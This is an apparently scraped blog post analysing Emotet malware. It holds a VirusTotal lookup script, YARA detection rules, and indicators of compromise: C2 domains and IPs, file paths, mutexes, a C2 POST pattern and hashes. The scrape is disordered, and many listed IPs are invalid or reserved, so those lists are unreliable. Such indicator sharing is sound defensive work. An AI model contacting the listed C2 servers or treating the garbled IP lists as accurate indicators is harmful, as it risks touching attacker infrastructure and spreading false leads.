79.246.31.144
217.160.182.191
85.72.31.144
173.212.203.26
229.246.31.144
92.222.216.44
197.97.31.144
136.243.177.26
39.220.31.144
37.157.194.134
109.145.1.187
190.211.207.11
42.187.1.187
104.236.246.93
0.185.31.144
190.18.146.70
106.170.0.80
103.255.150.84
236.81.0.80
138.201.140.110
25.228.31.144
41.220.119.246
185.91.0.80
200.71.148.138
123.201.31.144
85.54.169.141
144.9.31.144
144.139.247.220
177.98.0.80
149.202.153.252
139.57.31.144
31.172.240.91
132.33.31.144
186.4.172.5
162.155.1.187
178.79.161.166
159.49.1.187
186.4.172.5
11.121.31.144
206.189.98.125
183.38.31.144
87.106.139.101
191.213.31.144
46.105.131.87
154.43.0.80
45.123.3.54
164.136.1.187
222.214.218.192
24.229.31.144
85.106.1.166
107.38.195.80
83.136.245.190
187.251.31.144
179.32.19.219
81.245.0.22
152.89.236.214
94.90.31.144
181.31.213.158
191.118.31.144
87.106.136.232
5.99.31.144
47.41.213.2
242.29.0.22
201.251.43.69
44.96.31.144
24.51.106.145
203.164.0.21
87.230.19.21
247.190.31.144
190.228.72.244
159.210.0.53
181.143.194.138
182.205.1.187
182.176.106.43
48.218.3.227
31.12.67.62
1.200.27.168
182.76.6.2
61.222.31.144
190.226.44.20
236.34.0.21
181.143.53.227
142.62.0.21
189.209.217.49
166.94.0.80
190.186.203.55
12.241.0.80
27.147.163.188
240.43.31.144
159.65.25.128
181.243.31.144
101.187.237.217
42.25.0.20
80.11.163.139
74.18.1.187

208.122.173.22
168.18.200.122
183.73.159.56
191.22.193.46
138.170.87.87
81.119.65.250
87.13.18.11
131.204.66.22
186.12.112.168
18.9.31.78
94.142.220.140
224.0.111.93
209.122.173.22
156.22.194.116
186.22.241.91
254.34.154.42
207.139.48.64
149.120.30.139
141.127.226.246
115.70.243.136
55.126.153.119

227.249.156.225
99.148.153.99
99.236.236.198
43.237.139.220
96.173.142.196
173.129.173.193
111.144.227.131
118.240.152.147
60.137.137.202
82.173.141.221
76.220.151.221
35.175.138.192
138.150.171.195
147.145.244.114
63.242.156.225
99.156.249.227

Here is a script for searching every IP on virus total, but I don’t have any API key:’((((

import argparse
import requests
import json

# VirusTotal API URL and API key
VT_API_URL = 'https://www.virustotal.com/vtapi/v2/ip-address/report'
VT_API_KEY = '<API key here>'

# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('ip_file', help='Path to file containing list of IP addresses')
args = parser.parse_args()

# Read in IP addresses from file
ip_addresses = []
with open(args.ip_file, 'r') as f:
    for line in f:
        ip_addresses.append(line.strip())

# Iterate over IP addresses and query VirusTotal API for each one
for ip_address in ip_addresses:
    params = {'ip': ip_address, 'apikey': VT_API_KEY}
    response = requests.get(VT_API_URL, params=params)
    if response.status_code == 200:
        json_response = json.loads(response.text)
        if 'detected_urls' in json_response:
            num_detected = len(json_response['detected_urls'])
            print(f'{ip_address}: {num_detected} vendors marked as malicious')
        else:
            print(f'{ip_address}: No malicious detections')
    else:
        print(f'{ip_address}: Error querying VirusTotal API')

Yara Rule:

YARA (Yet Another Ridiculous Acronym) is a tool used for identifying and classifying malware. YARA rules are a set of instructions written in a specific syntax that allows YARA to identify patterns and characteristics of malware, including strings, files, and behavioral indicators.

A YARA rule consists of a set of conditions that describe specific characteristics of a malware sample. These conditions can be based on things like file names, file sizes, specific strings found in the file, and many other factors.

YARA rules are written in a language that is similar to regular expressions but more powerful, allowing for complex pattern matching and conditionals. Once a YARA rule has been written, it can be used to scan files and processes to identify potential malware infections.

YARA is a very popular tool among security researchers and analysts due to its flexibility and effectiveness in identifying and analyzing malware.

Example:

rule detect_malware {
    strings:
        $mz = { 4D 5A }
        $malware_string = "IsProcessorFeaturePresent"
    condition:
       $mz at 0 and $malware_string
}

This is a basic Yara Rule for Emotet Malware, But it will get a lot of also positive because IsProcessorFeaturePresent string exists in a lot of programs, we need a specific Code for hunting.

Let’s write a professional Yara Rule:

We need to find a specifically targeted code for our Yara Rule, let’s search:

For this hash function, we need to Oring it with others.

rule take_it_hash {
    strings:
        $string1 = { 66 83 F8 41 72 0E 66 83 F8 5A 77 08 0F B7 C0 83 C0 20 EB 03 }
        $string2 = { 0F B7 C0 69 D2 3F 00 01 00 03 D0 83 C1 02 0F B7 01 66 85 C0 75 D6 8B C2 C3 }
    condition:
        all of them
}

I just took the hex value of this function, But this rule is not official because registers change in every processor.

we need to rewrite registers with ?? mark.

rule EmotetHunting {
    strings:
        $string1  = "IsProcessorFeaturePresent" fullword ascii
        $string2  = { 66 83 ?? 41 72 ?? 66 83 ?? 5A [5-6] 83 ?? 20 EB [4-5] 69 ?? 3F 00 01 00 03 ?? 83 }
        
    condition:
        uint16(0) == 0x5a4d and all of them
}

And it works very well:

IOCs and C2 Server:

— — ->[| Here is only from my analysis |]← — —

focalaudiodesign.com
furstens.se
firstreport.com
sarahbradley.com
belongings.com

173.254.14.237
66.147.242.93

64.41.86.47
208.91.197.27
64.41.87.41
64.41.94.112
64.26.26.113

213.146.173.149
213.146.173.150

96.45.82.126
96.45.83.51
96.45.83.150
96.45.82.249
192.155.244.20
216.117.140.21

89.221.250.20

C:\Users\User\AppData\Local\machinemachine\machinemachine.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475

- 26e05b8e [ command line which is the hash of the malware path]

Global\IEE85EDF4 [mutex name EE85EDF4 which is the C drive serial number ]

Global\MEE85EDF4 [ mutex name ]

Global\EEE85EDF4 [ event name ]

Files[i]=[engine,finish,magnify,resapi,query,skip,wubi,svcs,router,crypto,backup,hans,xcl,con,edition,wide,loada,themes,syc,pink,tran,khmer,chx,excel,foot,wce,allow,play,publish,fwdr,prep,mspterm,nop,define,chore,shlp,maker,proc,cap,top,tablet,sizes,without,pen,dasmrc,move,cmp,rebrand,pixel,after,sms,minimum,umx,cpls,tangent,resw,class,colors,generic,license,mferror,kds,keydef,cable]

C:\Users\User\AppData\Local\file[i]+file[i]\file[i]+file[i].exe
C:\Users\User\AppData\Local\sizesxcl\sizesxcl.exe [ in my case ]

C:\Windows\SysWOW64\file[i]+file[i].exe
C:\Windows\SysWOW64\sizesxcl.exe [ in my case ]

C:\Users\User\AppData\Local\machinemachine.exe OR C:\Windows\SysWOW64\machinemachine.exe

%temp%\{random}.tmp
C:\ProgramData\ZmV3gQDwbARDj.exe [ randomly ]

— — -BEGIN RSA PUBLIC KEY — — -
MIIBCgKCAQEAnVHbKPJ3y7aaUr+MbmUlzdg/X1pbbRXZAiAnfSRMMFU6WewMjNYsDWM8jNjS
6bFHUv/XVZjK1Z/MUpzLR6FS1KJjxrLhlGSt9o+pPdtF+EcLQs1sOlDCnEJyKjOzC1km2ru
+22X9jxpPlJxrbO1OZaOTdWp+OprV7MYuJAd00vV0Yex8Icc2r7q3j0w+5ep2W5HpAXH7zj
pzwNvBRVKeY9NQr7r3q+3g==
— — -END RSA PUBLIC KEY — — -

URLS[i] = teapot,pnp,tpt,splash,site,codec,health,balloon,cab,odbc,badge,dma,psec,cookies,iplk,devices,enable,mult,prov,vermont,attrib,schema,iab,chunk,publish,prep,srvc,sess,ringin,nsip,stubs,img,add,xian,jit,free,pdf,loadan,arizona,tlb,forced,results,symbols,report,guids,taskbar,child,cone,glitch,entries,between,bml,usbccid,sym,enabled,merge,window,scripts,raster,acquire,json,rtm,walk,ban.

201.184.105.242
24.45.195.162

POST request
Referer: http://$IP/URLs[i]/URLs[i]/URLs[i]/..Content-Type: application/x-www-form-urlencoded..DNT: 1

Referer: http://24.45.195.162/acquire/glitch/taskbar/..Content-Type: application/x-www-form-urlencoded..DNT: 1 [ in my case ]

Referer: http://201.184.105.242/cone/enable/pdf/..Content-Type: application/x-www-form-urlencoded..DNT: 1 [ in my case ]

Mozilla/4.0 (compatible; MSIE 8.0; Windows Phone OS 7.5; Trident/4.0; IEMobile/8.0)

Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.9200

Mozilla/5.0 (Windows NT 6.2; WOW64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102Safari/537.36 Edge/18.9200

E77FF24EA71560FFCB9B6E63E9920787D858865BA09F5D63A7E44CB86A569A6E
591D32AEAE0554F744DF8843727E794D33495FF0A4B90A9F7861AB526988DED7

— — -> [| AND ALL IPS I LISTED | ← — —

201.184.105.242
24.45.195.162
80.11.163.139
198.199.114.69
192.254.173.31
190.108.228.48
185.94.252.13
211.63.71.72
192.81.213.192
190.145.67.134
104.131.11.150
212.71.234.16
86.98.25.30
188.166.253.46
186.75.241.230
78.24.219.147
173.212.203.26
136.243.177.26
190.211.207.11
190.18.146.70
138.201.140.110
200.71.148.138
144.139.247.220
31.172.240.91
178.79.161.166
206.189.98.125
46.105.131.87
222.214.218.192
83.136.245.190
152.89.236.214
87.106.136.232
201.251.43.69
87.230.19.21
181.143.194.138
31.12.67.62
190.226.44.20
189.209.217.49
27.147.163.188
101.187.237.217
182.176.132.213
124.240.198.66
190.53.135.159
45.33.49.124
85.104.59.244
0.0.0.0
82.247.43.63
89.69.239.237
118.45.133.126
38.20.105.112
102.169.31.18
106.74.19.228
83.55.170.72
51.160.162.201
115.89.127.66
95.159.132.69
41.157.204.63
84.236.45.32
115.231.121.183
80.162.173.19
75.201.70.224
109.50.163.138
23.171.51.195
43.96.147.203
51.91.155.84
22.173.122.208
183.188.69.224
120.122.139.58
22.173.122.215
239.58.51.55
59.119.24.38
176.61.135.173
22.173.122.209
246.98.161.230
41.188.76.226
14.98.127.130
175.116.98.254
22.173.122.215
168.224.104.90
44.251.93.150
77.248.223.100
251.112.68.212
165.56.224.81
182.165.155.14
49.181.164.39
18.66.128.247
130.125.36.76
154.82.175.140
0.0.1.0
22.173.122.209
32.48.17.37
113.145.95.177
22.173.122.208
106.44.0.54
212.141.216.178
255.164.128.23
22.173.122.209
139.193.54.101
69.46.57.104
217.239.139.215
22.173.122.223
227.11.104.8
9.200.135.87
36.238.220.189
131.57.95.47
147.205.71.217
86.252.205.4
36.238.221.58
86.138.240.203
92.139.178.149
87.130.178.149
86.194.168.215
76.141.189.212
8.131.185.205
80.157.240.203
69.153.240.192
86.129.172.220
72.140.189.203
64.130.179.223
83.129.176.213
80.194.168.202
8.138.185.205
71.135.240.205
8.154.185.202
71.156.168.149
65.140.177.204
87.143.185.149
65.152.185.149
80.155.172.215
8.156.185.192
74.135.178.215
73.194.185.203
49.193.149.191
25.113.227.141
36.238.220.184
44.100.212.253
135.37.25.90
36.238.220.176
161.217.127.28
149.197.199.208
36.238.220.148
75.157.179.203
65.156.174.204
58.127.102.215
129.209.162.217
120.183.74.194
36.238.221.206
69.131.240.209
65.155.173.149
71.152.175.149
8.129.168.201
8.130.191.193
65.138.181.206
93.157.240.202
65.131.180.210
80.129.179.223
8.151.189.213
65.156.172.149
65.138.240.201
8.158.176.209
80.194.172.216
8.157.185.195
73.157.189.221
86.140.185.203
8.156.185.205
8.150.177.204
87.139.174.149
67.194.175.203
73.194.185.202
65.138.165.220
173.175.221.143
205.90.92.99
36.238.220.188
113.239.246.27
56.29.214.64
36.238.220.190
210.143.91.195
75.254.154.212
174.171.129.238
134.252.116.81
61.231.191.52
168.159.190.96

Conclusion:

I would like to emphasize the importance of conducting thorough malware analysis to understand the behavior and functionality of malware. In the case of Emotet, the malware exhibited sophisticated evasion techniques, highlighting the need for advanced analysis methods to detect and prevent malware infections.

By examining the different stages of the malware analysis process, including email phishing, static analysis, and dynamic analysis, readers can gain a deeper understanding of the Emotet malware and its potential impact on systems and networks.

It is important for individuals and organizations to take proactive measures to prevent malware infections, including regular software updates, user awareness training, and advanced security solutions. By staying up-to-date with the latest malware trends and techniques, we can work towards a more secure digital environment.

Join Us for learning:

Malware Analysts FaceBook Private Group

Malware Analysts Telegram Private Group

Feel Free to message me on Linkedin:

https://www.linkedin.com/in/tamatahyt/

— — .“ سبحان الله وبحمد , سبحان الله العظيم “. — —

Emotet Malware Analysis - From Email Phishing to Code Analysis

Introduction:

Chat-GPT Opinion for my article:

#WHOAMI

INDEX:

Email Phishing:

Real-World Example:

Let’s investigate this domain,

Let’s see every IP in VirusTotal [ 107.167.2.226 ]:

Let’s see the second IP [ 64.79.170.62 ] and the 3rd IP [ 89.187.101.92 ]:

Document Static Analysis:

Document Dynamic Analysis:

With Googling by Chat-GPT helping, here are the details of the code:

Malware Basic Static Analysis:

.crt section? What does this warning mean?

Thanks for contributing an answer to Stack Overflow! Please be sure to answer the question. Provide details and share…

Behavioral Malware Analysis:

In this part, we will run the malware in our own sandbox and not in an online sandbox, Malware Analysts don’t prefer that.

Let’s see the Process Monitor tool:

Code Analysis:

UnPacking:

Real Code Analysis:

Real Emotet Persistence:

Let’s analyze the last function which I named to MalwareMainFunc:

Finding All C2 Server:

Yara Rule:

Let’s write a professional Yara Rule:

IOCs and C2 Server:

— — -> [| AND ALL IPS I LISTED | ← — —

Conclusion:

Join Us for learning:

— — .“ سبحان الله وبحمد , سبحان الله العظيم “. — —

Written by Mahmoud NourEldin